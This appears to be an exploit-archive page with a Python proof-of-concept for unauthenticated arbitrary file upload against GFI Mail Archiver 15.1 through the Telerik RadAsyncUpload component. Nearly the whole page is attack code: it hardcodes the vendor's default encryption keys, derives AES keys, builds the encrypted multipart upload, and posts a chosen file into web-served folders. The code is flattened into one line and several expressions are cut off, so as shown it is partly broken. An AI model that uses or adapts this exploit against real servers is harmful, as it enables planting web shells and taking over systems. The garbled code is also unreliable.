gfi mail archiver 15.1 telerik ui component arbitrary file upload (unauthenticated)

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gfi mail archiver 15.1 telerik ui component arbitrary file upload (unauthenticated) Code Code...
# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated) # Date: 21/03/2021 # Exploit Author: Amin Bohio # Original Research & Code By: Paul Taylor / Foregenix Ltd # Original Exploit: # Vendor Homepage: # Software Link: # Vulnerable Versions: GFI Mail Archiver <= 15.1 # Component Advisory: # Component Advisory: # Tested on: Windows & Linux # Usage: python3 -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver #!/usr/bin/python3 # Original Telerik Exploit Author: Paul Taylor / @bao7uo # # Modified by: Amin Bohio import sys import base64 import json import re import requests import os from Crypto.Cipher import AES from Crypto.Hash import HMAC from Crypto.Hash import SHA256 from Crypto.Hash import SHA1 from struct import Struct from operator import xor from itertools import starmap import binascii from requests.packages.urllib3.exceptions import InsecureRequestWarning # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 1 of 2 # Warning, the below prevents certificate warnings, # and verify = False (CERT_VERIFY prevents them being verified requests.packages.urllib3.disable_warnings(InsecureRequestWarning) CERT_VERIFY = False # ****************************************** # ****************************************** class PBKDF: def sha1(v): hl = hl.update(v) return hl.digest() def derive1(password, salt): hash = (password + salt).encode() for i in range(0, 99): hash = PBKDF.sha1(hash) result = PBKDF.sha1(hash) i = 1 while len(result) < 48: result += PBKDF.sha1(str(i).encode() + hash) i += 1 return result def hmacsha1(v): hl = PBKDF.mac.copy() hl.update(v) return bytearray(hl.digest()) def derive2(password, salt): # Credit: @mitsuhiko result_length = 48 PBKDF.mac =, None, result = [] for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1): rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b)) for i in range(999): u = PBKDF.hmacsha1(u) rv = starmap(xor, zip(rv, u)) result.extend(rv) result = b''.join(map(bytes, [result]))[:result_length] return result def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])): if type == 1: result = PBKDF.derive1(password, salt) result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack elif type == 2: result = PBKDF.derive2(password, salt) return result[0:32], result[32:] class RAUCipher: # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 2 of 2 # Default settings are for vulnerable versions before 2017 patches with default keys T_Upload_ConfigurationHashKey = \ "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey T_AsyncUpload_ConfigurationEncryptionKey = \ "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password # Latest tested version working with this setting: 2018.1.117 # Probably working up to and including 2018.3.910 PBKDF_ALGORITHM = 1 # Earliest tested version working with this setting: 2019.2.514 # Probably introduced 2019.1.115 # PBKDF_ALGORITHM = 2 # ****************************************** # ****************************************** key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD) # print(binascii.hexlify(key).decode().upper()) # print(binascii.hexlify(iv).decode().upper()) def encrypt(plaintext): sys.stderr.write("Encrypting... ") encoded = "" for i in plaintext: encoded = encoded + i + "\x00" plaintext = encoded + ( chr(16 - (len(encoded) % 16)) * (16 - (len(encoded) % 16)) ) cipher =, AES.MODE_CBC, RAUCipher.iv) sys.stderr.write("done\n") return base64.b64encode(cipher.encrypt(plaintext.encode())).decode() def decrypt(ciphertext): sys.stderr.write("Decrypting... ") ciphertext = base64.b64decode(ciphertext) cipher =, AES.MODE_CBC, RAUCipher.iv) unpad = lambda s: s[0:-ord(chr(s[-1]))] sys.stderr.write("done\n") return unpad(cipher.decrypt(ciphertext)).decode()[0::2] def addHmac(string, Version): isHmacVersion = False # "Encrypt-then-MAC" feature introduced in R1 2017 # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.) if int(Version[:4]) >= 2017: isHmacVersion = True hmac = bytes(RAUCipher.HASHKEY.encode()), string.encode(), ) hmac = base64.b64encode(hmac.digest()).decode() return string + hmac if isHmacVersion else string def getProxy(proxy): return { "http" : proxy, "https" : proxy } def rauPostData_enc(partA, partB): data = "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n" data += "\r\n" data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n" return data def rauPostData_prep(TempTargetFolder, Version): TargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(""), Version ) TempTargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(TempTargetFolder), Version ) partA = \ '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \ TempTargetFolder + \ '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}' partB = \ "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \ Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4" return rauPostData_enc(partA, partB) def payload(TempTargetFolder, Version, payload_filename): sys.stderr.write("Local file path: " + payload_filename + "\n") payload_filebasename = os.path.basename(payload_filename) sys.stderr.write("Destination file name: " + payload_filebasename + "\n") sys.stderr.write("Destination path: " + TempTargetFolder + "\n") sys.stderr.write("Version: " + Version + "\n") sys.stderr.write("Preparing payload... \n") payload_file = open(payload_filename, "rb") payload_file_data = payload_file.close() data = rauPostData_prep(TempTargetFolder, Version) data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" data += "Content-Type: application/octet-stream\r\n" data += "\r\n" data += payload_file_data.decode("raw_unicode_escape") + "\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"fileName\"\r\n" data += "\r\n" data += "RAU_crypto.bypass\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"contentType\"\r\n" data += "\r\n" data += "text/html\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n" data += "\r\n" data += "2019-01-02T03:04:05.067Z\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"metadata\"\r\n" data += "\r\n" data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \ payload_filebasename + "\"}\r\n" data += "-----------------------------62616f37756f2f--\r\n" data += "\r\n" sys.stderr.write("Payload prep done\n") return data def upload(data, url, proxy = False): global CERT_VERIFY sys.stderr.write("Preparing to send request to " + url + "\n") session = requests.Session() request = requests.Request( "POST", url, data=data ) request = request.prepare() request.headers["Content-Type"] = \ "multipart/form-data; " +\ "boundary=---------------------------62616f37756f2f" response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy)) sys.stderr.write("Request done\n") return response.text def decode_rauPostData(rauPostData): rauPostData = rauPostData.split("&") rauJSON = RAUCipher.decrypt(rauPostData[0]) decoded = "\nJSON: " + rauJSON + "\n" TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"] decoded = decoded + "\nTempTargetFolder = " + \ RAUCipher.decrypt(TempTargetFolder) + "\n" rauVersion = RAUCipher.decrypt(rauPostData[1]) decoded = decoded + "\nVersion: " + rauVersion + "\n" return decoded def mode_decrypt(): # decrypt ciphertext ciphertext = sys.argv[2] print("\n" + RAUCipher.decrypt(ciphertext) + "\n") def mode_Decrypt_rauPostData(): # decrypt rauPostData rauPostData = sys.argv[2] print(decode_rauPostData(rauPostData)) def mode_encrypt(): # encrypt plaintext plaintext = sys.argv[2] print("\n" + RAUCipher.encrypt(plaintext) + "\n") def mode_Encrypt_rauPostData(): # encrypt rauPostData based on TempTargetFolder and Version TempTargetFolder = sys.argv[2] Version = sys.argv[3] print( "rauPostData: " + rauPostData_prep(TempTargetFolder, Version) + "\n" ) def mode_payload(): # generate a payload based on TempTargetFolder, Version and payload file TempTargetFolder = sys.argv[2] Version = "2013.1.417.40" payload_filename = sys.argv[4] print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f") print(payload(TempTargetFolder, Version, payload_filename)) def mode_Post(proxy = False): # generate and upload a payload based on # TempTargetFolder, Version, payload file and url Version = "2013.1.417.40" url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau" payload_filename = sys.argv[4] TempTargetFolder = sys.argv[6] print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy)) print("\n[+] Check your uploaded file\n"); def mode_help(): print( "Usage: \nExample1: python3 -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'") sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n") sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n") if len(sys.argv) < 2: mode_help() elif sys.argv[1] == "-u" and len(sys.argv) == 7: mode_Post() else: mode_help()

Gfi mail archiver 15.1 telerik ui component arbitrary file upload (unauthenticated) Vulnerability / Exploit Source : Gfi mail archiver 15.1 telerik ui component arbitrary file upload (unauthenticated)

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